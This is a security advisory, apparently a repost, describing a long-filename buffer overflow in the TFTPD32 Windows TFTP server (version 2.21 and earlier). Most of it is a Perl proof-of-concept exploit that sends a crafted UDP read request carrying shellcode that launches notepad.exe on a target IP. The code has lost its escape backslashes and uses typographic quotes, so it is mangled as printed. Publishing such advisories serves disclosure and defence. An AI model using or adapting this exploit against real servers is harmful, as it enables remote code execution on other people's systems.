‘TFTPD32 Buffer Overflow Vulnerability (Long filename)’

Summary

TFTPD32 is a Freeware TFTP server for Windows 9x/NT/XP. It provides an implementation of the TFTPv2 protocol (specified in the RFC 1350).

A vulnerability in the product allows remote attackers to cause the product to execute arbitrary code.’

Credit:

‘The information has been provided by SecurITeam Experts.’


Details

Vulnerable systems:
 * TFTP32 version 2.21 and prior

Immune systems:
 * TFTP32 version 2.50.2

Exploit:
#!/usr/bin/perl
#TFTP Server remote Buffer Overflow
use IO::Socket;
$host = ‘192.168.1.53’;
$port = ’69’;
$data = ‘A’;

#$buf .= ‘x00x02’; # Send —- Choose one
$buf .= ‘x00x01’; # Recieve

$buf .= ‘A’;
$num = ‘116’;
$buf .= $data x $num;
$buf .= ‘.’;
$num = ‘140’; # EIP section
$buf .= $data x $num;

$address = ‘xFFxFFxFFxFF’;
$buf .= $address;

$egg = ‘xEBx27x8Bx34x24x33xC9x33xD2xB2’;
$egg .= ‘x0Bx03xF2x88x0Ex2BxF2xB8xAFxA7’;
$egg .= ‘xE6x77xB1x05xB2x04x2BxE2x89x0C’;
$egg .= ‘x24x2BxE2x89x34x24xFFxD0x90xEB’;
$egg .= ‘xFDxE8xD4xFFxFFxFF’;
$egg .= ‘notepad.exe’;

$egg .= ‘x90x90x90x90x90x90’;
$buf .= $egg;

$buf .= ‘x00binaryx00’;

$socket = IO::Socket::INET->new(Proto => ‘udp’) or die ‘Socket error: $@n’;
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);
send($socket, $buf, 0, $portaddr) == length($buf) or die ‘Can’t send: $!n’;
print ‘Now, ‘$host’ should open up a notepadn’;’

Categories: Windows